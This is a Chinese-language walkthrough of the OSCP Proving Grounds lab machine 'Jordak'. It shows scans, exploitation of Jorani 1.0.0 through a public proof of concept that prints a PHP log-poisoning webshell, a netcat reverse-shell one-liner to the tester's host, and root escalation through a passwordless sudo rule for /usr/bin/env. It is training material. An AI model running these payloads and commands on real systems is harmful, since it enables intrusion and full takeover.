OSCP - Proving Grounds - Jordak

主要知识点

  • /usr/bin/env提权

具体步骤

执行nmap扫描

复制代码
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-27 19:54 China Standard Time
Nmap scan report for 192.168.221.109
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现80端口开放,但看不到任何内容,所以dirb一下,发现了很多路径开放,也有很多潜在的线索

复制代码
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.221.109
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes:   307,400,403,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.gitattributes       (Status: 200) [Size: 505]
/.gitignore           (Status: 200) [Size: 477]
/composer.json        (Status: 200) [Size: 973]
/composer.lock        (Status: 200) [Size: 91293]
/docker-compose.yml   (Status: 200) [Size: 499]
/Dockerfile           (Status: 200) [Size: 879]
/phpunit.xml          (Status: 200) [Size: 465]
/README.md            (Status: 200) [Size: 4958]
/sonar-project.properties (Status: 200) [Size: 336]
/sql/                 (Status: 200) [Size: 2898]
/tests                (Status: 301) [Size: 318] [--> http://192.168.221.109/tests/]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

最终发现一个登录页面,是Jorani v1.0.0,

搜索一下相应的vulnerability信息,发现了

Jorani 1.0.0 - Remote Code Execution (CVE-2023-26469) - Vulnerability & Exploit Database

按照其中描述的exp,在本地执行

复制代码
PS C:\Users\Administrator\Documents\OFFSEC\Practice\GoToWork\Jordak> python .\CVE_Jorani.py http://192.168.221.109

        /!\ Do not use this if you are not authorized to /!\

[?] POC made by @jrjgjk (Guilhem RIOUX)

[?] Header used for exploit: FNUAWCDCVYLM
[?] Requesting session cookie
[?] Poisonning log file with payload: '<?php if(isset($_SERVER['HTTP_FNUAWCDCVYLM'])){system(base64_decode($_SERVER['HTTP_FNUAWCDCVYLM']));} ?>'
[?] Set path traversal to '../../application/logs'
[+] Recoveredd CSRF Token: 8d68027d90188dcbad14f3ad9ccaf80e
[?] Accessing log file: log-2024-10-27
jrjgjk@jorani(PSEUDO-TERM)
$ id

uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)

jrjgjk@jorani(PSEUDO-TERM)
$ rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.192 80 >/tmp/f

但是exp自带的命令行并不是一个真正的shell,于是我们需要建立一个reverse shell先,发现 jordak属于sudo组,并且可以不需要密码执行/usr/bin/env

复制代码
jordak@jordak:/home/jordak$ id
id
uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)
jordak@jordak:/home/jordak$ sudo -l
sudo -l
Matching Defaults entries for jordak on jordak:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jordak may run the following commands on jordak:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/env

搜索一下GTFObings,得到 /usr/bin/env可以使用如下方式提权

提权成功

复制代码
sudo /usr/bin/env /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
47f2032a288a0d113c92c07df6a9ad18
相关推荐
wanhengidc5 分钟前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
czijin2 小时前
【论文阅读】Security of Language Models for Code: A Systematic Literature Review
论文阅读·人工智能·安全·语言模型·软件工程
2501_915921433 小时前
iOS混淆工具实战 在线教育直播类 App 的课程与互动安全防护
android·安全·ios·小程序·uni-app·iphone·webview
monster_风铃4 小时前
小补充: IPv6 安全RA
网络·安全·智能路由器
运维开发王义杰4 小时前
信息安全:代码质量双雄对决,SonarQube 与 Codacy,传统巨擘与云原生新贵的深度剖析
安全·云原生
塔子终结者5 小时前
网络安全A模块专项练习任务十解析
java·服务器·网络安全
2301_780789665 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
王火火(DDoS CC防护)6 小时前
服务器IP暴露被攻击了怎么办?
服务器·网络安全·ddos攻击
恒拓高科WorkPlus6 小时前
安全聊天:为何内网 IM 系统成企业首选?
安全
Clownseven7 小时前
云市场周报 (2025.09.05):解读腾讯云AI安全、阿里数据湖与KubeVela
人工智能·安全·腾讯云